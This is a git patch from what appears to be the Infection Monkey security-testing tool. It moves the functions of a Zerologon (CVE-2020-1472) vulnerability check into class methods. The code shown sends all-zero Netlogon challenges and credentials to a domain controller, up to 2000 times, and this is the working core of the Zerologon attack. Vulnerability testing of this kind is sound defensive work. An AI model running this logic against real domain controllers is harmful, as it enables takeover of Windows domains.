From 62a1520c5082be0d99f09287a6ec8e90109e0721 Mon Sep 17 00:00:00 2001 From: Shreya Date: Tue, 3 Nov 2020 16:42:33 +0530 Subject: [PATCH] Extract nested function --- .../network/windowsserver_fingerprint.py | 104 +++++++++--------- 1 file changed, 52 insertions(+), 52 deletions(-) diff --git a/monkey/infection_monkey/network/windowsserver_fingerprint.py b/monkey/infection_monkey/network/windowsserver_fingerprint.py index a19d54ff4..f418fd4bc 100644 --- a/monkey/infection_monkey/network/windowsserver_fingerprint.py +++ b/monkey/infection_monkey/network/windowsserver_fingerprint.py @@ -20,62 +20,11 @@ class WindowsServerFinger(HostFinger): MAX_ATTEMPTS = 2000 _SCANNED_SERVICE = "NTLM (NT LAN Manager)" - def get_dc_name(self, DC_IP): - """ - Gets NetBIOS name of the Domain Controller (DC). - """ - name = '' - try: - nb = nmb.NetBIOS.NetBIOS() - name = nb.queryIPForName(ip=DC_IP) # returns either a list of NetBIOS names or None - return name[0] if name else None - except BaseException as ex: - LOG.info(f'Exception: {ex}') - def get_host_fingerprint(self, host): """ Checks if the Windows Server is vulnerable to Zerologon. """ - def try_zero_authenticate(DC_HANDLE, DC_IP, DC_NAME): - # Connect to the DC's Netlogon service. - binding = epm.hept_map(DC_IP, nrpc.MSRPC_UUID_NRPC, - protocol='ncacn_ip_tcp') - rpc_con = transport.DCERPCTransportFactory(binding).get_dce_rpc() - rpc_con.connect() - rpc_con.bind(nrpc.MSRPC_UUID_NRPC) - - # Use an all-zero challenge and credential. - plaintext = b'\x00' * 8 - ciphertext = b'\x00' * 8 - - # Standard flags observed from a Windows 10 client (including AES), with only the sign/seal flag disabled. - flags = 0x212fffff - - # Send challenge and authentication request. - nrpc.hNetrServerReqChallenge( - rpc_con, DC_HANDLE + '\x00', DC_NAME + '\x00', plaintext) - - try: - server_auth = nrpc.hNetrServerAuthenticate3( - rpc_con, DC_HANDLE + '\x00', DC_NAME + - '$\x00', nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel, - DC_NAME + '\x00', ciphertext, flags - ) - - # It worked! - assert server_auth['ErrorCode'] == 0 - return rpc_con - - except nrpc.DCERPCSessionError as ex: - if ex.get_error_code() == 0xc0000022: # STATUS_ACCESS_DENIED error; if not this, probably some other issue. - pass - else: - raise Exception(f'Unexpected error code: {ex.get_error_code()}.') - - except BaseException as ex: - raise Exception(f'Unexpected error: {ex}.') - DC_IP = host.ip_addr DC_NAME = self.get_dc_name(DC_IP) DC_HANDLE = '\\\\' + DC_NAME @@ -88,7 +37,7 @@ class WindowsServerFinger(HostFinger): rpc_con = None for _ in range(0, self.MAX_ATTEMPTS): try: - rpc_con = try_zero_authenticate(DC_HANDLE, DC_IP, DC_NAME) + rpc_con = self.try_zero_authenticate(DC_HANDLE, DC_IP, DC_NAME) if rpc_con is not None: break except Exception as ex: @@ -109,3 +58,54 @@ class WindowsServerFinger(HostFinger): else: LOG.info('Error encountered; most likely not a Windows Domain Controller.') return False + + def get_dc_name(self, DC_IP): + """ + Gets NetBIOS name of the Domain Controller (DC). + """ + + try: + nb = nmb.NetBIOS.NetBIOS() + name = nb.queryIPForName(ip=DC_IP) # returns either a list of NetBIOS names or None + return name[0] if name else None + except BaseException as ex: + LOG.info(f'Exception: {ex}') + + def try_zero_authenticate(self, DC_HANDLE, DC_IP, DC_NAME): + # Connect to the DC's Netlogon service. + binding = epm.hept_map(DC_IP, nrpc.MSRPC_UUID_NRPC, + protocol='ncacn_ip_tcp') + rpc_con = transport.DCERPCTransportFactory(binding).get_dce_rpc() + rpc_con.connect() + rpc_con.bind(nrpc.MSRPC_UUID_NRPC) + + # Use an all-zero challenge and credential. + plaintext = b'\x00' * 8 + ciphertext = b'\x00' * 8 + + # Standard flags observed from a Windows 10 client (including AES), with only the sign/seal flag disabled. + flags = 0x212fffff + + # Send challenge and authentication request. + nrpc.hNetrServerReqChallenge( + rpc_con, DC_HANDLE + '\x00', DC_NAME + '\x00', plaintext) + + try: + server_auth = nrpc.hNetrServerAuthenticate3( + rpc_con, DC_HANDLE + '\x00', DC_NAME + + '$\x00', nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel, + DC_NAME + '\x00', ciphertext, flags + ) + + # It worked! + assert server_auth['ErrorCode'] == 0 + return rpc_con + + except nrpc.DCERPCSessionError as ex: + if ex.get_error_code() == 0xc0000022: # STATUS_ACCESS_DENIED error; if not this, probably some other issue. + pass + else: + raise Exception(f'Unexpected error code: {ex.get_error_code()}.') + + except BaseException as ex: + raise Exception(f'Unexpected error: {ex}.')